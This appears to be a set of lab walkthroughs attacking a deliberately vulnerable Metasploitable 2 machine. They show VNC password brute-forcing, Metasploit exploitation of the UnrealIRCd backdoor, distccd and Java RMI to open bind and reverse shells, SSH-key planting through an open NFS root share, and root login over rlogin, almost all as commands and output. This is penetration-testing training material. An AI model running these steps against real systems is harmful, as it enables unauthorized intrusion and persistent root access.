Set the username as root and set the target. We will be using default Metasploit wordlist.
msf6 auxiliary(scanner/vnc/vnc_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/vnc/vnc_login) > run
[*] 192.168.204.136:5900 - 192.168.204.136:5900 - Starting VNC login sweep
[!] 192.168.204.136:5900 - No active DB -- Credential data will not be saved!
[+] 192.168.204.136:5900 - 192.168.204.136:5900 - Login Successful: :password
[*] 192.168.204.136:5900 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) > Run the exploit and we will have our password which is password.
Now, we can use VNC viewer to connect to target.
┌──(kali㉿kali)-[~]
└─$ vncviewer 192.168.204.136
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:Port 6667 ircd Exploitation Metasploitable2
Scanning port 6667
First scan the port with vuln script so see if we get some useful information
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 6667 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:19 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: Host: irc.Metasploitable.LAN
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 secondsWe can see that it finds out that the port may have trojan in it.
Vulnerability Assessment
Let us see if searchsploit finds something.
──(kali㉿kali)-[~]
└─$ searchsploit unreal
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service | multiple/dos/22223.txt
Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities | multiple/remote/32363.txt
Epic Games Unreal Engine 436 - URL Directory Traversal | multiple/remote/22224.txt
Epic Games Unreal Engine Logging Function - Remote Denial of Service | multiple/dos/30513.txt
Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite | multiple/remote/24041.c
Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier | multiple/dos/21593.txt
Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String | multiple/dos/23799.txt
Unreal Commander 0.92 - Directory Traversal | windows/remote/30569.py
Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite | multiple/remote/30521.txt
Unreal Engine - 'ReceivedRawBunch()' Denial of Service | multiple/dos/34340.txt
Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service | multiple/dos/32386.txt
Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC) | multiple/dos/34261.txt
Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service | multiple/dos/32362.txt
Unreal Tournament - Remote Buffer Overflow (SEH) | windows/remote/16145.pl
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit) | linux/remote/16848.rb
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit) | windows/remote/16693.rb
Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit) | linux/remote/10032.rb
Unreal Tournament 2004 - Null Pointer Remote Denial of Service | multiple/dos/32125.txt
Unreal Tournament 3 - Memory Corruption (Denial of Service) | multiple/dos/32127.txt
Unreal Tournament 3 1.3 - Directory Traversal | windows/remote/6506.txt
Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service | windows/dos/14414.txt
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
-------------------------------------------We do have UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) .
Unreal IRCD Exploitation with Metasploit
Let us fire up metasploit and exploit it.
msf6 > search unreal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
1 exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
2 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136Set the payload as cmd/unix/bind_ruby .
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_rubyNow run it, and we will get the shell.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] 192.168.204.136:6667 - Connected to 192.168.204.136:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.204.136:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.135:38267 -> 192.168.204.136:4444) at 2024-03-19 10:26:45 -0400
ls
Donation
LICENSE
aliases
badwords.channel.conf
badwords.message.conf Port 2049 NFS Exploitation Metasploitable 2
First quickly scan the target.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 2049 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 02:30 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).
PORT STATE SERVICE
2049/tcp open nfs
MAC Address: 00:0C:29:71:62:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 secondsWe can see that the port is open. Now we can see what NFS shares are available to be mounted.
┌──(kali㉿kali)-[~] └─$ showmount -e 192.168.204.136
Export list for 192.168.204.136: / *
The command showmount -e 192.168.204.136 is used to display the list of directories shared by an NFS (Network File System) server located at the IP address 192.168.204.136.
The output you provided indicates that there is one shared directory available on the NFS server at that IP address. Here's the breakdown of the output:
Export list for 192.168.204.136:: This line indicates that the following list displays the directories that are exported (shared) by the NFS server at the specified IP address./ *: This line specifies the shared directory and its export options. In this case,/represents the root directory of the file system, and*indicates that it is exported to all hosts. This means that any host in the network that has access to the NFS server can mount this directory and access its contents.
In summary, the output indicates that the NFS server at 192.168.204.136 is sharing its root directory (/) to all hosts on the network.
Now, we can mount it.
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.204.136:/ /mnt/nfs
Created symlink /run/systemd/system/remote-fs.target.wants/rpc-statd.service → /usr/lib/systemd/system/rpc-statd.service.
┌──(kali㉿kali)-[~]
└─$ df -k
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1963284 0 1963284 0% /dev
tmpfs 401016 1268 399748 1% /run
/dev/sda1 82083148 14386412 63481188 19% /
tmpfs 2005072 0 2005072 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 401012 128 400884 1% /run/user/1000
192.168.204.136:/ 7282176 1486656 5428544 22% /mnt/nfs
┌──(kali㉿kali)-[~]
└─$ cd /mnt/nfs
┌──(kali㉿kali)-[/mnt/nfs]
└─$ ls
bin cdrom etc initrd lib media nohup.out proc sbin sys usr vmlinuz
boot dev home initrd.img lost+found mnt opt root srv tmp var
Now we can generate a SSH key.
┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fPlTqIgu9KBlLupk7ZEBlm9RZSNxmDvjuF7EBi4MqQw root@kali
The key's randomart image is:
+---[RSA 3072]----+
| +== |
| .. .o+ . |
|E+ o . |
|B + ++ . . . |
|.+ =o+o S o . . |
| +.X. . o o . |
| o X.+. . . o |
|o +.=.. . |
|oo.+ .. |
+----[SHA256]-----+Now copy the public key to target ssh folder.
┌──(root㉿kali)-[~/.ssh]
└─# ls
id_rsa id_rsa.pub
┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt/nfs/root/.ssh/Now, append it to authorized keys file.
┌──(root㉿kali)-[/mnt/nfs/root/.ssh]
└─# cat id_rsa.pub >> authorized_keysWe can now connect to our machine with SSH. (Having errors)
Ports 512,513,514 remote services exploitations - Metasploitable 2
TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation).
Lets scan if these ports are open.
──(kali㉿kali)-[/]
└─$ sudo nmap -p 512,513,514 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:26 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00052s latency).
PORT STATE SERVICE
512/tcp open exec
513/tcp open login
514/tcp open shell
MAC Address: 00:0C:29:71:62:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 secondsNow we can connect to it.
┌──(kali㉿kali)-[/]
└─$ rlogin -l root 192.168.204.136
Last login: Sat Apr 27 02:22:48 EDT 2024 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# Port 3632 distccd exploitation - Metasploitable 2
This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice.
Let us scan it.
┌──(kali㉿kali)-[/]
└─$ sudo nmap -p 3632 --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:47 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00058s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_ https://distcc.github.io/security.html
MAC Address: 00:0C:29:71:62:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
We can now use metasploit to exploit it.
msfconsole
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf6 exploit(unix/misc/distcc_exec) > run
[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.137:44185 -> 192.168.204.136:4444) at 2024-04-27 04:54:44 -0400
id
uid=1(daemon) gid=1(daemon) Port 1099 - Java-rmi exploitation - Metasploitable 2
Let us first scan the target.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 1099 -sC -sV --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 01:11 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
1099/tcp open java-rmi GNU Classpath grmiregistry
| rmi-vuln-classloader:
| VULNERABLE:
| RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
| References:
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
Now, we can use metasploit JAVA RMI module to exploit it.
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > search java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 auxiliary/scanner/misc/java_jmx_server 2013-05-22 normal No Java JMX Server Insecure Endpoint Code Execution Scanner
3 auxiliary/gather/java_rmi_registry normal No Java RMI Registry Interfaces Enumeration
4 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
5 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
6 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
7 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
8 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
9 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
10 exploit/linux/http/kibana_timelion_prototype_pollution_rce 2019-10-30 manual Yes Kibana Timelion Prototype Pollution RCE
11 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
12 exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315 2023-05-26 excellent Yes Openfire authentication bypass with RCE plugin
13 exploit/multi/http/torchserver_cve_2023_43654 2023-10-03 excellent Yes PyTorch Model Server Registration and Deserialization RCE
14 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
15 exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc 2021-09-21 manual Yes VMware vCenter vScalation Priv Esc
Interact with a module by name or index. For example info 15, use 15 or use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
msf6 > use 4
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/misc/java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.204.137:4444
[*] 192.168.204.136:1099 - Using URL: http://192.168.204.137:8080/qhpKsPkUu
[*] 192.168.204.136:1099 - Server started.
[*] 192.168.204.136:1099 - Sending RMI Header...
[*] 192.168.204.136:1099 - Sending RMI Call...
[*] 192.168.204.136:1099 - Replied to request for payload JAR
[*] Sending stage (57971 bytes) to 192.168.204.136
[*] Meterpreter session 1 opened (192.168.204.137:4444 -> 192.168.204.136:48969) at 2024-04-28 01:50:00 -0400
meterpreter > Interrupt: use the 'exit' command to quit
Port 5432 Postgresql Exploitation - Metasploitable 2
Let us first scan the target.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 5432 -sC -sV --script=vuln 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 02:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://www.securityfocus.com/bid/70574
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_ http://www.openssl.org/news/secadv_20140605.txt
| vulners:
| cpe:/a:postgresql:postgresql:8.3:
| SSV:60718 10.0 https://vulners.com/seebug/SSV:60718 *EXPLOIT*
| PRION:CVE-2013-1903 10.0 https://vulners.com/prion/PRION:CVE-2013-1903
| PRION:CVE-2013-1902 10.0 https://vulners.com/prion/PRION:CVE-2013-1902
| CVE-2013-1903 10.0 https://vulners.com/cve/CVE-2013-1903
| CVE-2013-1902 10.0 https://vulners.com/cve/CVE-2013-1902
| CVE-2019-10164 9.0 https://vulners.com/cve/CVE-2019-10164
| SSV:30015 8.5 https://vulners.com/seebug/SSV:30015 *EXPLOIT*
| SSV:19652 8.5 https://vulners.com/seebug/SSV:19652 *EXPLOIT*
| PRION:CVE-2010-1447 8.5 https://vulners.com/prion/PRION:CVE-2010-1447
| PRION:CVE-2010-1169 8.5 https://vulners.com/prion/PRION:CVE-2010-1169
| POSTGRESQL:CVE-2013-1900 8.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2013-1900
| POSTGRESQL:CVE-2010-1169 8.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1169
| CVE-2010-1447 8.5 https://vulners.com/cve/CVE-2010-1447
| CVE-2010-1169 8.5 https://vulners.com/cve/CVE-2010-1169
| SSV:19754 7.5 https://vulners.com/seebug/SSV:19754 *EXPLOIT*
| CVE-2015-3166 7.5 https://vulners.com/cve/CVE-2015-3166
| CVE-2015-0244 7.5 https://vulners.com/cve/CVE-2015-0244
| SSV:30152 6.8 https://vulners.com/seebug/SSV:30152 *EXPLOIT*
| SECURITYVULNS:VULN:10252 6.8 https://vulners.com/securityvulns/SECURITYVULNS:VULN:10252
| PRION:CVE-2013-0255 6.8 https://vulners.com/prion/PRION:CVE-2013-0255
| PRION:CVE-2012-0868 6.8 https://vulners.com/prion/PRION:CVE-2012-0868
| PRION:CVE-2009-3231 6.8 https://vulners.com/prion/PRION:CVE-2009-3231
| POSTGRESQL:CVE-2013-0255 6.8 https://vulners.com/postgresql/POSTGRESQL:CVE-2013-0255
| POSTGRESQL:CVE-2012-0868 6.8 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0868
| POSTGRESQL:CVE-2009-3231 6.8 https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3231
| CVE-2013-0255 6.8 https://vulners.com/cve/CVE-2013-0255
| CVE-2012-0868 6.8 https://vulners.com/cve/CVE-2012-0868
| CVE-2009-3231 6.8 https://vulners.com/cve/CVE-2009-3231
| SSV:62083 6.5 https://vulners.com/seebug/SSV:62083 *EXPLOIT*
| SSV:62016 6.5 https://vulners.com/seebug/SSV:62016 *EXPLOIT*
| SSV:61543 6.5 https://vulners.com/seebug/SSV:61543 *EXPLOIT*
| SSV:19018 6.5 https://vulners.com/seebug/SSV:19018 *EXPLOIT*
| SSV:15153 6.5 https://vulners.com/seebug/SSV:15153 *EXPLOIT*
| SSV:15097 6.5 https://vulners.com/seebug/SSV:15097 *EXPLOIT*
| SSV:15095 6.5 https://vulners.com/seebug/SSV:15095 *EXPLOIT*
| SECURITYVULNS:VULN:10803 6.5 https://vulners.com/securityvulns/SECURITYVULNS:VULN:10803
| SECURITYVULNS:VULN:10473 6.5 https://vulners.com/securityvulns/SECURITYVULNS:VULN:10473
| PRION:CVE-2014-0065 6.5 https://vulners.com/prion/PRION:CVE-2014-0065
| PRION:CVE-2014-0064 6.5 https://vulners.com/prion/PRION:CVE-2014-0064
| PRION:CVE-2014-0063 6.5 https://vulners.com/prion/PRION:CVE-2014-0063
| PRION:CVE-2014-0061 6.5 https://vulners.com/prion/PRION:CVE-2014-0061
| PRION:CVE-2012-0866 6.5 https://vulners.com/prion/PRION:CVE-2012-0866
| PRION:CVE-2010-4015 6.5 https://vulners.com/prion/PRION:CVE-2010-4015
| PRION:CVE-2010-0442 6.5 https://vulners.com/prion/PRION:CVE-2010-0442
| POSTGRESQL:CVE-2014-0065 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0065
| POSTGRESQL:CVE-2014-0064 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0064
| POSTGRESQL:CVE-2014-0063 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0063
| POSTGRESQL:CVE-2014-0061 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0061
| POSTGRESQL:CVE-2012-0866 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0866
| POSTGRESQL:CVE-2010-4015 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2010-4015
| POSTGRESQL:CVE-2009-4136 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2009-4136
| POSTGRESQL:CVE-2009-3230 6.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3230
| CVE-2021-32027 6.5 https://vulners.com/cve/CVE-2021-32027
| CVE-2015-0243 6.5 https://vulners.com/cve/CVE-2015-0243
| CVE-2015-0242 6.5 https://vulners.com/cve/CVE-2015-0242
| CVE-2015-0241 6.5 https://vulners.com/cve/CVE-2015-0241
| CVE-2014-0065 6.5 https://vulners.com/cve/CVE-2014-0065
| CVE-2014-0064 6.5 https://vulners.com/cve/CVE-2014-0064
| CVE-2014-0063 6.5 https://vulners.com/cve/CVE-2014-0063
| CVE-2014-0061 6.5 https://vulners.com/cve/CVE-2014-0061
| CVE-2012-0866 6.5 https://vulners.com/cve/CVE-2012-0866
| CVE-2010-4015 6.5 https://vulners.com/cve/CVE-2010-4015
| CVE-2010-0442 6.5 https://vulners.com/cve/CVE-2010-0442
| SECURITYVULNS:VULN:11183 6.0 https://vulners.com/securityvulns/SECURITYVULNS:VULN:11183
| PRION:CVE-2010-3433 6.0 https://vulners.com/prion/PRION:CVE-2010-3433
| PRION:CVE-2010-1170 6.0 https://vulners.com/prion/PRION:CVE-2010-1170
| POSTGRESQL:CVE-2010-3433 6.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2010-3433
| POSTGRESQL:CVE-2010-1170 6.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1170
| CVE-2022-2625 6.0 https://vulners.com/cve/CVE-2022-2625
| CVE-2018-10915 6.0 https://vulners.com/cve/CVE-2018-10915
| CVE-2010-3433 6.0 https://vulners.com/cve/CVE-2010-3433
| CVE-2010-1170 6.0 https://vulners.com/cve/CVE-2010-1170
| SSV:15154 5.8 https://vulners.com/seebug/SSV:15154 *EXPLOIT*
| SSV:15096 5.8 https://vulners.com/seebug/SSV:15096 *EXPLOIT*
| POSTGRESQL:CVE-2009-4034 5.8 https://vulners.com/postgresql/POSTGRESQL:CVE-2009-4034
| CVE-2023-2454 5.8 https://vulners.com/cve/CVE-2023-2454
| SSV:19669 5.5 https://vulners.com/seebug/SSV:19669 *EXPLOIT*
| PRION:CVE-2010-1975 5.5 https://vulners.com/prion/PRION:CVE-2010-1975
| POSTGRESQL:CVE-2010-1975 5.5 https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1975
| CVE-2023-2455 5.5 https://vulners.com/cve/CVE-2023-2455
| CVE-2010-1975 5.5 https://vulners.com/cve/CVE-2010-1975
| CVE-2021-23214 5.1 https://vulners.com/cve/CVE-2021-23214
| PRION:CVE-2011-2483 5.0 https://vulners.com/prion/PRION:CVE-2011-2483
| CVE-2017-7486 5.0 https://vulners.com/cve/CVE-2017-7486
| CVE-2015-3167 5.0 https://vulners.com/cve/CVE-2015-3167
| SSV:61546 4.9 https://vulners.com/seebug/SSV:61546 *EXPLOIT*
| SSV:60334 4.9 https://vulners.com/seebug/SSV:60334 *EXPLOIT*
| PRION:CVE-2014-0062 4.9 https://vulners.com/prion/PRION:CVE-2014-0062
| PRION:CVE-2012-3488 4.9 https://vulners.com/prion/PRION:CVE-2012-3488
| POSTGRESQL:CVE-2014-0062 4.9 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0062
| POSTGRESQL:CVE-2012-3488 4.9 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-3488
| CVE-2014-0062 4.9 https://vulners.com/cve/CVE-2014-0062
| CVE-2012-3488 4.9 https://vulners.com/cve/CVE-2012-3488
| SSV:61544 4.6 https://vulners.com/seebug/SSV:61544 *EXPLOIT*
| PRION:CVE-2014-0067 4.6 https://vulners.com/prion/PRION:CVE-2014-0067
| CVE-2014-0067 4.6 https://vulners.com/cve/CVE-2014-0067
| PRION:CVE-2012-2143 4.3 https://vulners.com/prion/PRION:CVE-2012-2143
| POSTGRESQL:CVE-2012-2143 4.3 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-2143
| POSTGRESQL:CVE-2012-0867 4.3 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0867
| CVE-2012-2143 4.3 https://vulners.com/cve/CVE-2012-2143
| SSV:61547 4.0 https://vulners.com/seebug/SSV:61547 *EXPLOIT*
| SSV:61545 4.0 https://vulners.com/seebug/SSV:61545 *EXPLOIT*
| SSV:60335 4.0 https://vulners.com/seebug/SSV:60335 *EXPLOIT*
| SSV:60186 4.0 https://vulners.com/seebug/SSV:60186 *EXPLOIT*
| SSV:4928 4.0 https://vulners.com/seebug/SSV:4928 *EXPLOIT*
| SECURITYVULNS:VULN:9765 4.0 https://vulners.com/securityvulns/SECURITYVULNS:VULN:9765
| PRION:CVE-2014-0066 4.0 https://vulners.com/prion/PRION:CVE-2014-0066
| PRION:CVE-2014-0060 4.0 https://vulners.com/prion/PRION:CVE-2014-0060
| PRION:CVE-2012-3489 4.0 https://vulners.com/prion/PRION:CVE-2012-3489
| PRION:CVE-2012-2655 4.0 https://vulners.com/prion/PRION:CVE-2012-2655
| PRION:CVE-2009-3229 4.0 https://vulners.com/prion/PRION:CVE-2009-3229
| POSTGRESQL:CVE-2014-0066 4.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0066
| POSTGRESQL:CVE-2014-0060 4.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0060
| POSTGRESQL:CVE-2012-3489 4.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-3489
| POSTGRESQL:CVE-2012-2655 4.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2012-2655
